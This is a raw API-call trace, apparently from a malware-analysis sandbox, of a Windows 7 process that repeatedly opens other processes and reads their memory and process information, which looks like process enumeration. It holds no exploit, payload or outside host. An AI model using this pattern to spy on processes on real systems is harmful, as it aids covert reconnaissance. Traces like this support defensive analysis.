[0404.793] CloseHandle (hObject=0x240) returned 1
[0404.794] _ui64tow (_Value=0x360, _Buffer="1604", _Radix=10) returned="864"
[0404.798] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="864") returned 3
[0404.800] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.800] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.833] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x360) returned 0x240
[0404.834] GetLastError () returned 0x0
[0404.834] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.834] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.834] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.834] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x122910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.835] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1226f0, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.836] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.837] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.837] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.838] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x121ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.838] malloc (_Size=0x6c) returned 0x2c4740
[0404.838] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x122754, lpBuffer=0x2c4740, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.838] free (_Block=0x2c4740)
[0404.839] CloseHandle (hObject=0x240) returned 1
[0404.840] _ui64tow (_Value=0x8a8, _Buffer="864", _Radix=10) returned="2216"
[0404.845] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2216") returned 4
[0404.847] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.847] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.869] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a8) returned 0x240
[0404.869] GetLastError () returned 0x0
[0404.869] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.869] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.869] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.870] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x252930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.870] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2526ea, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.871] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.872] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.872] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.872] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x251ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.873] malloc (_Size=0x78) returned 0x2c4740
[0404.873] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x25275a, lpBuffer=0x2c4740, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.873] free (_Block=0x2c4740)
[0404.874] CloseHandle (hObject=0x240) returned 1
[0404.875] _ui64tow (_Value=0x8b4, _Buffer="2216", _Radix=10) returned="2228"
[0404.879] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2228") returned 4
[0404.881] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.881] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.903] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b4) returned 0x240
[0404.903] GetLastError () returned 0x0
[0404.903] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.903] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.903] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.904] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c28f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.904] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c26ea, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.905] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.906] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.906] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.907] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.907] malloc (_Size=0x62) returned 0x2c0800
[0404.907] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c2744, lpBuffer=0x2c0800, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0404.907] free (_Block=0x2c0800)
[0404.908] CloseHandle (hObject=0x240) returned 1
[0404.909] _ui64tow (_Value=0x8ec, _Buffer="2228", _Radix=10) returned="2284"
[0404.916] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2284") returned 4
[0404.918] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.918] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.942] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x240
[0404.942] GetLastError () returned 0x0
[0404.942] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.942] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.942] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.942] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b2940, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.943] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b26f6, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.944] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.945] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.946] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.946] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.946] malloc (_Size=0x78) returned 0x2c4740
[0404.946] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b2766, lpBuffer=0x2c4740, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0404.946] free (_Block=0x2c4740)
[0404.947] CloseHandle (hObject=0x240) returned 1
[0404.948] _ui64tow (_Value=0x918, _Buffer="2284", _Radix=10) returned="2328"
[0404.953] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2328") returned 4
[0404.954] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.954] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.018] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x918) returned 0x240
[0405.018] GetLastError () returned 0x0
[0405.018] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.018] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.018] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.019] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1029e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.019] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1027a0, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.020] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.050] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.050] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.050] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x101ef0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.051] malloc (_Size=0x78) returned 0x2c4740
[0405.051] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x102810, lpBuffer=0x2c4740, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.051] free (_Block=0x2c4740)
[0405.052] CloseHandle (hObject=0x240) returned 1
[0405.052] _ui64tow (_Value=0x920, _Buffer="2328", _Radix=10) returned="2336"
[0405.056] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2336") returned 4
[0405.057] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.057] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.103] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x920) returned 0x240
[0405.103] GetLastError () returned 0x0
[0405.103] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.103] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.103] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.103] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3e2940, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.104] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3e26fa, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.105] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.106] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.106] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.106] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3e1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.106] malloc (_Size=0x76) returned 0x2c4740
[0405.106] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3e2768, lpBuffer=0x2c4740, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.107] free (_Block=0x2c4740)
[0405.107] CloseHandle (hObject=0x240) returned 1
[0405.108] _ui64tow (_Value=0x928, _Buffer="2336", _Radix=10) returned="2344"
[0405.129] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2344") returned 4
[0405.130] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.130] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.154] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x928) returned 0x240
[0405.154] GetLastError () returned 0x0
[0405.154] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.154] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.154] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.155] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x442910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.155] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4426ee, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.156] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.157] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.157] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.158] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x441ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.158] malloc (_Size=0x6c) returned 0x2c4740
[0405.158] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x442752, lpBuffer=0x2c4740, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.158] free (_Block=0x2c4740)
[0405.159] CloseHandle (hObject=0x240) returned 1
[0405.160] _ui64tow (_Value=0x930, _Buffer="2344", _Radix=10) returned="2352"
[0405.165] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2352") returned 4
[0405.166] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.166] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x930) returned 0x240
[0405.190] GetLastError () returned 0x0
[0405.190] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.190] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.190] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.190] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2828c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.191] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2826e0, lpBuffer=0x12dd100, nSize=0x50, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.192] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.194] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.194] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.194] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x281ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.194] malloc (_Size=0x58) returned 0x2b99b0
[0405.194] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x282730, lpBuffer=0x2b99b0, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2b99b0*, lpNumberOfBytesRead=0x0) returned 1
[0405.195] free (_Block=0x2b99b0)
[0405.195] CloseHandle (hObject=0x240) returned 1
[0405.196] _ui64tow (_Value=0x938, _Buffer="2352", _Radix=10) returned="2360"
[0405.201] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2360") returned 4
